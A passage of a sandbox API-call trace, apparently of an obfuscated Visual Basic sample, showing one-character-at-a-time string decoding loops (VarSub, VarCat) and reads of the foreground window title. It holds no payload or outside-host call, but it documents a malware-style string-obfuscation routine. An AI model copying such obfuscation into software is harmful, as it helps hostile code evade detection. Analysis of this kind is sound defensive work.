pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0086.923] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0086.923] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0086.925] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0086.925] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.926] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.926] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.926] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.927] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.927] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.927] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.928] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.928] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.928] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.929] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.929] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.929] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.930] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.930] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.931] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.931] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.931] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.931] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.932] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.932] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.933] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.933] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.934] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.934] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.934] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.934] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.935] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.935] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.936] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.936] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.937] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.937] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.938] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.938] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.938] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.939] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.957] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.958] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.958] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.958] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.959] GetForegroundWindow () returned 0x102c2 [0086.959] GetLastError () returned 0x0 [0086.959] SysStringLen (param_1=" ") returned 0xff [0086.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.959] SysStringLen (param_1=" ") returned 0xff [0086.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.959] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.959] GetLastError () returned 0x0 [0086.960] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.960] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.960] SysStringLen (param_1="Act") returned 0x3 [0086.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0xe57084, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0086.960] SetWindowTextA (hWnd=0x2036e, lpString="Act") returned 1 [0086.960] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0086.960] GetFocus () returned 0x0 [0086.961] lstrlenA (lpString="Act") returned 3 [0086.961] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe57084) returned 0x1 [0086.961] IsWindow (hWnd=0x2036e) returned 1 [0086.961] IsWindow (hWnd=0x2036e) returned 1 [0086.961] IsWindow (hWnd=0x2036e) returned 1 [0086.961] IsWindow (hWnd=0x2036e) returned 1 [0086.962] GetFocus () returned 0x0 [0086.962] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.962] GetFocus () returned 0x0 [0086.962] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x4) returned 0x310bcd0 [0086.962] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x4, lParam=0x310bcd0) returned 0x3 [0086.962] GetFocus () returned 0x0 [0086.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0086.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0xe57084, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0086.963] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.963] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.964] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.964] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.964] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.965] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.965] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.965] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.966] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.966] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.967] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.967] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.967] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.968] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.968] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.968] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.969] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.969] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.970] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.970] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.970] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: 